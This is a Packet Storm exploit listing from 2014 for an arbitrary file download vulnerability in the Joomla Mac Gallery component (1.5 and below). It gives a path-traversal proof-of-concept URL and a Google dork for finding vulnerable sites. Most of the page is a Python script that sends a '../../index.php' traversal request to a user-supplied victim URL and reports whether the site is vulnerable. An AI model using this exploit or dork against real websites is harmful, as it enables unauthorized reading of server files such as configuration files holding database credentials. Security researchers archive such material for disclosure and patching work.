what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Joomla Mac Gallery 1.5 Arbitrary File Download

Joomla Mac Gallery 1.5 Arbitrary File Download
Posted Sep 22, 2014
Authored by Claudio Viviani

Joomla Mac Gallery component versions 1.5 and below suffer from an arbitrary file download vulnerability.

tags | exploit, arbitrary
SHA-256 | 92c2bf84e86e20561df1eaa9ca9f6fd9ec03e8c9b1092777059db18344af0e07

Joomla Mac Gallery 1.5 Arbitrary File Download

Change Mirror Download
######################

# Exploit Title : Joomla Mac Gallery <= 1.5 Arbitrary File Download

# Exploit Author : Claudio Viviani

# Vendor Homepage : https://www.apptha.com

# Software Link : https://www.apptha.com/downloadable/download/sample/sample_id/18

# Dork Google: inurl:option=com_macgallery

# Date : 2014-09-17

# Tested on : Windows 7 / Mozilla Firefox

# Linux / Mozilla Firefox

# Info:

# Joomla Mac Gallery suffers from Arbitrary File Download vulnerability

# PoC Exploit:

#http://localhost/index.php?option=com_macgallery&view=download&albumid=[../../filename]

#"album_id" variable is not sanitized.

######################

#!/usr/bin/env python

# http connection
import urllib, urllib2
# Args management
import optparse
# Error managemen
import sys

banner = """
__ __ ___ ___
|__.-----.-----.--------| .---.-. | Y .---.-.----.
| | _ | _ | | | _ | |. | _ | __|
| |_____|_____|__|__|__|__|___._| |. \_/ |___._|____|
|___| |: | |
|::.|:. |
`--- ---'
_______ __ __ _____ _______
| _ .---.-| | .-----.----.--.--. | _ | | _ |
|. |___| _ | | | -__| _| | | |.| |__| 1___|
|. | |___._|__|__|_____|__| |___ | `-|. |__|____ |
|: 1 | |_____| |: | |: 1 |
|::.. . | |::.| |::.. . |
`-------' `---' `-------'

j00ml4 M4c G4ll3ry <= 1.5 4rb1tr4ry F1l3 D0wnl04d

Written by:

Claudio Viviani

http://www.homelab.it

info@homelab.it
homelabit@protonmail.ch

https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""

# Check url
def checkurl(url):
if url[:8] != "https://" and url[:7] != "http://":
print('[X] You must insert http:// or https:// procotol')
sys.exit(1)
else:
return url

def connection(url,pathtrav):
try:
response = urllib2.urlopen(url+'/index.php?option=com_macgallery&view=download&albumid='+pathtrav+'index.php')
content = response.read()
if content != "":
print '[!] VULNERABLE'
print '[+] '+url+'/index.php?option=com_macgallery&view=download&albumid='+pathtrav+'index.php'
else:
print '[X] Not Vulnerable'
except urllib2.HTTPError:
print '[X] HTTP Error'
except urllib2.URLError:
print '[X] Connection Error'

commandList = optparse.OptionParser('usage: %prog -t URL')
commandList.add_option('-t', '--target', action="store",
help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
)
options, remainder = commandList.parse_args()

# Check args
if not options.target:
print(banner)
commandList.print_help()
sys.exit(1)

print(banner)

url = checkurl(options.target)
pathtrav = "../../"

connection(url,pathtrav)
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close